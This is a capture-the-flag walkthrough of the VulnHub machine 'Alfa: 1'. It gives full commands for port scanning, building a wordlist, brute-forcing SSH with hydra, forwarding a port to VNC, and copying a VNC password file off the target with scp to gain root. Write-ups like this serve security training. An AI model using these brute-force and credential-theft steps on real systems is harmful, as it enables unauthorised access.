Alfa: 1 is another awesome box on vulnhub. The difficulties of this box is Medium, and need to do Enumeration, Brute Force to get into the system. Here is the link https://www.vulnhub.com/entry/alfa-1,655/

-Enumeration
-Brute Force
-User
-Privilege Escalation
-Root

#nmap

 #nmap -p- -sV 192.168.1.X 
PORT        STATE   SERVICE     VERSION
 21/tcp       open       ftp           vsftpd 3.0.3
 80/tcp       open       http          Apache httpd 2.4.38 ((Debian))
 139/tcp     open  netbios-ssn    Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
 445/tcp     open  netbios-ssn    Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
 65111/tcp open       ssh           OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
 Service Info: Host: ALFA; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

#ftp anonymous login allow

checked every single port, got ftp allowed anonymous user allow to login. after logged in into it got the directory name thomas (guess, it may be username) and get a image file named milo.jpg

#enumrate web service

Stuck at ftp service, try to enumerate http service, and after some directory fuzzing got nothing more than robots.txt after dig into robots.txt found brainfuck code

Simply decode it using dcode.fr and get /alfa-support

Visit /alfa-support and get hint about password

#crunch & sed

Create a custom wordlist with milo followed by 3 numerical digits

$crunch 3 3 1234567890 wordlist.txt

add milo as prefix using sed

$sed -i -e 's/^/milo/' wordlist.txt

#brute-force

as we have username thomas can bruteforce ssh service running on port number 65111 using hydra

$hydra -s 65111 -l thomas -P wordlist.txt 192.168.1.X -t 4 ssh

#user-flag

login via ssh and will get user.txt

#privilege escalation

run linpeas.sh on machine and find out vnc service on port 5901 locally

here found same privilege escalation scenario
https://medium.com/@D00MFist/hack-the-box-poison-3d95f552ec36

forward my local port 7000 (attacking machine) to port 5901 

$sudo ssh -L 7000:localhost:5901 [email protected] -p 65111

After attempting to connect, password required I tried milo666 as password but failed.

$vncviewer 127.0.0.1:7000

as i said same scenario for privilege escalation i also got .remote_secret password file, i simply copy that file from target to attacker box using scp

$scp .remote_secret [email protected]:/home/Desktop/secret

using -passwd option

$vncviewer 127.0.0.1:7000 -passwd secret

Successfully got root flag 🙂

LEAVE A REPLY

Please enter your comment!
Please enter your name here